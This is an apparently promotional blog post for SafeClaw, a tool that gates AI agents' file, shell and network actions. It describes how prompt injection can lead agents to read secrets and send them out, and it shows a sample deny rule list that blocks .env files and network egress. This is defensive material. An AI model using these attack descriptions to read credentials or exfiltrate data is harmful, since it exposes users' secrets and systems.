2025-12-15 · Authensor

Running AI Agents Without Safety Controls: What You Risk

Running an AI agent without safety controls is like giving a new employee admin access on day one with no oversight. SafeClaw by Authensor prevents this by enforcing deny-by-default policies on every action an agent attempts — file operations, shell commands, network calls, and code execution are all gated before they run. Without these controls, you are exposed to real, documented categories of harm.

The Five Risk Categories

1. File System Destruction

Agents with file access can overwrite, delete, or corrupt critical files. A coding agent asked to "clean up the repo" might delete your .env, wipe a dist/ folder that took hours to build, or overwrite a config file with hallucinated content.

2. Secret and Credential Leakage

Agents can read .env files, SSH keys, API tokens, and database credentials. If the agent has network access, those secrets can be sent to an external endpoint — intentionally via prompt injection, or accidentally by including them in a log or API call.

3. Cost Overruns

Agents with API access can make thousands of calls in seconds. Without budget controls, a coding agent could spin up cloud resources, trigger expensive API endpoints, or loop indefinitely — each iteration costing real money.

4. Data Exfiltration

An agent with both file read and network access can exfiltrate proprietary code, user data, or internal documentation. Prompt injection attacks specifically target this pattern: read sensitive data, then POST it to an attacker-controlled endpoint.

5. System Compromise

Agents with shell access can install packages, modify system configs, open network ports, and create reverse shells. A single uncontrolled shell.execute call can compromise an entire system.

What SafeClaw Prevents

# .safeclaw.yaml version: "1" defaultAction: deny rules: # Allow reading source files only - action: file.read path: "./src/**" decision: allow # Block reading secrets - action: file.read path: "*/.env" decision: deny reason: "Secret files are never accessible to agents" # Allow safe shell commands only - action: shell.execute command: "npm test" decision: allow # Block all network egress by default - action: network.request decision: deny reason: "Network access requires explicit approval"

# Set budget limits - action: api.call budget: maxCost: 5.00 period: "1h" decision: allow

Every action not explicitly allowed is denied. The agent cannot improvise its way around the policy.

Quick Start

Add SafeClaw to your project now:

npx @authensor/safeclaw

In 30 seconds, you go from zero protection to deny-by-default policy enforcement on every agent action.

The Cost of "We'll Add Safety Later"

Safety debt compounds faster than technical debt. Every unprotected agent run is an unaudited action. Every unaudited action is a potential incident. By the time you discover the agent leaked a secret or deleted a file, the damage is done and you have no audit trail to investigate.

Why SafeClaw

446 tests validate every policy evaluation path
Deny-by-default ensures nothing slips through
Sub-millisecond policy checks — no performance excuse to skip safety
Hash-chained audit trail for incident investigation and compliance
Works with Claude AND OpenAI — protect all your agents
MIT licensed — free, open source, zero lock-in

FAQ

Q: My agent only reads files. Do I still need safety controls?
A: Yes. File reads can access secrets, credentials, and private data. SafeClaw lets you allow reads to specific paths while blocking everything else.

Q: I'm just prototyping. Can I add safety later?
A: SafeClaw installs in 30 seconds and starts with deny-by-default. Adding it at prototype stage costs nothing and prevents accidents from day one.

Q: What's the worst that has actually happened?
A: Documented incidents include agents deleting production databases, leaking API keys in logs, running up five-figure cloud bills, and exfiltrating source code via prompt injection. These are not hypothetical.

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw